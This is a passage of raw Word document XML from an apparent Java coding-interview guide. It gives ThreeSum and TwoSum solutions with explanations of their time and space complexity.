          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> solution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new</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ThreeSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617E695"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0088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in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nums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6666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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0</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1</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006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</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6666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5DA17"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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> result </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xml:space="preserve"> solution</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threeSum</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nums</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC76C7"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0066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out</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println</w:t>
      </w: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result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282582A4" w14:textId="777777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000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825BE81" w14:textId="1B1F7C77" w:rsidR="00212F69" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F028877" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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ime Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A2E00" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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orting the array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sorting the array takes O(nlog</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⁡</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n)O(n \log n)O(nlogn), where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160377B7" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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wo-pointer approach</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The main logic involves iterating over the array with one pointer and using two pointers to find the triplet. For each element, we do a linear scan with the two pointers, which takes O(n)O(n)O(n) for each iteration of the first loop. The outer loop runs nnn times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E14666C" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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refore, the overall time complexity of this algorithm is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA06E4" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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n2)(since for each element, we do a linear scan with two pointers)O(n^2) \quad \text{(since for each element, we do a linear scan with two pointers)}O(n2)(since for each element, we do a linear scan with two pointers) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D72183" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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pace Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D5969" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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pace complexity is O(k)O(k)O(k), where kkk is the number of triplets found. In the worst case, the number of triplets can be O(n2)O(n^2)O(n2), but generally it would be less.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBDB2D" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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pace complexity also includes the space for storing the result, which in the worst case is proportional to the number of triplets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A41281" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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us, the space complexity is O(k)O(k)O(k), where kkk is the number of triplets in the result list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266D1CE" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C6">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How to Optimize the Time Complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B97E4" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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given solution already has an optimal time complexity of O(n2)O(n^2)O(n2). This is the best achievable time complexity for the 3-sum problem because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4EC750" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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orting the array takes O(nlog</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⁡</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n)O(n \log n)O(nlogn).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C413ED2" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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The two-pointer technique is efficient and linear with respect to the number of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E13FAAC" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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brute force approach where you try all combinations of three elements would take O(n3)O(n^3)O(n3), so the two-pointer approach is already a significant optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84600A" w14:textId="77777777" w:rsidR="001D71C6" w:rsidRPr="00CE4B95" w:rsidRDefault="001D71C6" w:rsidP="001D71C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re is no way to improve the time complexity beyond O(n2)O(n^2)O(n2) because you need to check each combination of triplets (although, by sorting the array and skipping duplicates, we reduce unnecessary computations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A35CC" w14:textId="77777777" w:rsidR="00212F69" w:rsidRPr="00CE4B95" w:rsidRDefault="00212F69" w:rsidP="00212F69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7358CE61" w14:textId="2E49D464" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc196307849"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00200024" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>TwoSum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w14:paraId="7C31B724" w14:textId="77777777" w:rsidR="00DD47F9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00DD47F9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: nums = [2,7,11,15], target = 9 Output: [0,1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BEB99" w14:textId="7A5FCC52" w:rsidR="00DD47F9" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD47F9" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>Explanation: nums[0] + nums[1] = 2 + 7 = 9, so return [0, 1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A0873" w14:textId="482E5069" w:rsidR="00DD47F9" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD47F9" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>How will you optimize the time complexity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2437E" w14:textId="33CFB844" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD47F9" w:rsidP="00DD47F9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is space complexity?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914141C" w14:textId="30B7330E" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B08763"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46B6E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3C93B"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woSum</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BABCC4D"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twoSu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targ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8C98715"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e a map to store the number and its index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FF3B2"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ma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p>
    <w:p w14:paraId="44449695"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16519E55"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num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433F24D"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compleme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targe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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3627D"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1946528B"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f complement exists in the map, return the pair of indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D95F03"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ntainsKe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mpleme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31EB8A0"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mpleme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p>
    <w:p w14:paraId="2C9DB75B"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98FE0BF"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5FADCC30"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therwise, add the current number and its index to the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F2E3F"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um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p>
    <w:p w14:paraId="0F1DF471"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B374675"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62969AD8"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f no solution is found (not necessary for this problem as per constraints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF2DFB"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2F53C409"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B945C8B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF2114"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A94DB46"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7</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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BACF28E"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targe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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E22187"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522D2044"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esul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twoS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um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target</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BC3F2"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Indices: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esul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esul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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8DC54" w14:textId="77777777"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F335D0E" w14:textId="04D57895" w:rsidR="00DB5DF3" w:rsidRPr="00CE4B95"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28228765" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B" w:rsidP="00DB464B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB107D4" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: O(n)O(n)O(n), where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55863D8F" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We only need to traverse the array once. In each iteration, checking and inserting an element into the hash map takes constant time, i.e., O(1)O(1)O(1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F48638" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Space Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: O(n)O(n)O(n), where nnn is the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDE211" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>We use a hash map to store the indices of the elements, so in the worst case, the space used by the hash map is proportional to the number of elements in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79668A34" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B" w:rsidP="00DB464B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is Optimized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0D989" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The naive approach takes O(n2)O(n^2)O(n2) because it checks every pair. By using a hash map, you reduce this to O(n)O(n)O(n), which is much more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036454C" w14:textId="77777777" w:rsidR="00DB464B" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB464B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
